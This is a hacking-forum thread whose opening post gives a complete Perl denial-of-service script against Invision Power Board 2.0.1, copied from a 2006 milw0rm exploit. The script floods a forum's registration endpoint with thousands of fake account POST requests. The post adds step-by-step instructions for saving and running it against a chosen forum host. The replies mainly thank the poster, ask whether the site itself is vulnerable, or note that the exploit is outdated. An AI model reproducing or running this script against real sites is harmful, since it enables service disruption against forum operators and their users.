Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


How to shutdown Forums filter_list
Author
Message
How to shutdown Forums #1
First copy this code:
#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By HeR #
##BlooDCode #
##www.hackcommunity.com #
##milestankovic@hotmail.rs #
##SRBIJA #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
#Tested on IPB 2.0.1 #
# created By HeR. BlooDCode #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]
and paste it to notepad
Than save it as .pl
Than go to command prompt
type cd Desktop
than type perl thename.pl
than that will apear
enter the forum host
and start it



*THE CODE ISNT MY I JUST CHANGE IT*

Reply

RE: How to shutdown Forums #2
nice... but can u explain what it does? pls
[Image: weepn.png]

Reply

RE: How to shutdown Forums #3
nice Smile now, is this forum protected? Tongue
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: How to shutdown Forums #4
Nice ill try this now trying to get photoshop first
<?php echo "Very inactive at this current moment in time"; ?>
[Image: Z8KDe.png]

Reply

RE: How to shutdown Forums #5
you are welcome Biggrin Biggrin Biggrin Biggrin
(05-26-2011, 04:09 PM)1llusion Wrote: nice Smile now, is this forum protected? Tongue

xD ofc it isn't try to shutdown it with a simple ping and you will shutdonw it after 20 sec Biggrin Biggrin

Reply

RE: How to shutdown Forums #6
Does Not work now.
Update : milw0rm is Shutdown.
[Image: 9Kcm1.png]
To the Mind that is still, The Whole World Surrenders.
Exploiter on Team OpenFire
C,C++,Java and Perl source Developer.

Reply

RE: How to shutdown Forums #7
(05-27-2011, 06:47 PM)Coded32 Wrote: Does Not work now.
Update : milw0rm is Shutdown.

agreed...i waz try..nt workin ....Biggrin

Reply

RE: How to shutdown Forums #8
incomplete tutorial,man.
Siggy is too big, sorry mate, size should be around 650x180 max.. Check FAQ for more info.
-1llusion
PS: Pm me if you want the link to your old siggy.
hack to learn,dont learn to hack.

Reply

RE: How to shutdown Forums #9
Because milw0rm is shut down

Reply

RE: How to shutdown Forums #10
the reason is not "because milw0rm is shut down",
but "because it's 2006 IPB exploit", and this thread posted at 2011.

Reply







Users browsing this thread: 1 Guest(s)